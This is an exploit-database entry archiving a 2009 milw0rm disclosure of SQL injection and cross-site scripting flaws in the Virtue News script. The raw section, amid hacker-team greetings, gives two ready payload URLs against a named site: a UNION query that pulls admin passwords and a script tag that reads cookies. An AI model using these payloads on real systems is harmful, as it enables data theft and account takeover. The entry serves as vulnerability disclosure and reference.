Virtue News Multiple Remote Vulnerabilities

vendor:

Virtue News

by:

Snakespc

9,3

CVSS

HIGH

SQL Injection and XSS

89, 79

CWE

Product Name: Virtue News

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Virtue News Multiple Remote Vulnerabilities

Virtue News is prone to multiple remote vulnerabilities, including SQL injection and XSS. An attacker can exploit these issues to manipulate SQL queries, access or modify data, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Users should never visit untrusted websites or follow links provided by unknown or untrusted sources. Additionally, users should never supply sensitive information unless the destination website is known and trusted. Furthermore, users should always use the latest version of all software.

Source

Exploit-DB raw data:

Viva l'AlgÃ©rie 3-1  --->Karim Matmour-->Abdel-Kader Ghazal-->Rafik al-Zuhair Jabbur-->
FÃ©licitations Ã  tous les AlgÃ©riens
L'AlgÃ©rie bat l'Egypte 3-1 Ã  aller
El akouba pour le retour
#-------------------------AllaH AkbaR-------------------------------
#Virtue News Multiple Remote Vulnerabilities
#-------------------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com
#Site:http://www.snakespc.com/sc/index.php
#
#            les AlgÃ©riens Kamikaz Wa4rin Fi kol Bla4s 
#-------------------------SNAKES TEAM-------------------------------
#Script:Virtue News
#
#
#http://www.virtuenetz.com/news_manager.php
#--------------------------SNAKES TEAM------------------------------
#Exploit:
#--------
#Demo:sql
#http://www.virtuenetz.com/news/news_detail.php?nid=-2+UNION%20SELECT%201,2,3,password,5,6,7+from+admin--
#Xss
#http://www.virtuenetz.com/news/news_detail.php?nid="><script>alert(document.cookie)</script>
#-------------------------SNAKES TEAM-------------------------------
# Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4 --->Tous les AlgÃ©riens
#--------------------------SNAKES TEAM------------------------------
#ALL www.SnakespC.com/sc>>>> (  Members )  >>>>Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-06-08]